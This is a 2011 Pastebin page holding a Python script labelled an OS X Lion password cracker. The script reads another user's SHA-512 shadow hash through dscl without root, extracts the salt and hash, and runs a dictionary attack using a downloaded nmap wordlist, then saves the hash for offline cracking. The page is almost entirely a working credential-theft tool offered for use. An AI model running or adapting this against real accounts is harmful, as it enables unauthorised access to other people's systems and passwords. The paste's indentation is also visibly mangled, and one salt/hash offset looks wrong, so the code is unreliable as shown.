defenceindepth

OS X Lion Password Cracker

Sep 18th, 2011
33,266
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  24.  
  25. def check(password): # Hash password and compare
  26.        
  27.     if not password.startswith("#!"): # Ignore comments
  28.  
  29.         guess = hashlib.sha512(salt_hex + password).hexdigest()
  30.         print("Trying... " + password)
  31.    
  32.         if guess == hash:
  33.             print("Cleartext password for user '"+username+"' is : "+password)
  34.             exit(0)
  35.  
  36. if len(sys.argv) < 2:
  37.     print("No username given. Defaulting to current user.")
  38.     defaultuser = True
  39. else:
  40.     username = sys.argv[1]
  41.  
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  44.  
  45. if defaultuser:
  46.     username = whoami.rstrip()
  47.  
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  50.  
  51. list = dscl_out.split("\n")
  52.  
  53. for pos,item in enumerate(list): # extract digest
  54.     if "dsAttrTypeNative:ShadowHashData" in item:
  55.         digest = list[pos+1].replace(" ", "")
  56.  
  57. if len(digest) == 262: # Out of box configuration  
  58.     salt = digest[56:64]   
  59.     hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61.     print("SMB is on")
  62.     salt = digest[104:112]
  63.     hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65.     salt = digest[176:184]
  66.     hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68.     salt = digest[224:232]
  69.     hash = digest[232:360]
  70.  
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  73.  
  74. salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  75.  
  76. if len(sys.argv) == 3: # If dictionary file specified
  77.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78.         check(whoami.rstrip())
  79.     passlist = open(sys.argv[2], "r")
  80.         password = passlist.readline()
  81.  
  82.         while password:
  83.                 check(password.rstrip())
  84.                 password = passlist.readline()
  85.         passlist.close()
  86.  
  87. else: # No dictionary file specified
  88.         print("No dictionary file specified. Defaulting to hard coded link.")
  89.        
  90.     passlist = urllib2.urlopen(link) # Download dictionary file
  91.         passwords = passlist.read().split("\n")
  92.     print("\nPassword list successfully read")
  93.    
  94.     passwords.append(whoami.rstrip())  
  95.    
  96.     print("\nCracking...")
  97.         for password in passwords:
  98.                 check(password)
  99.  
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  105.  
  106. print("\nPassword not found. Try another dictionary.\n")
RAW Paste Data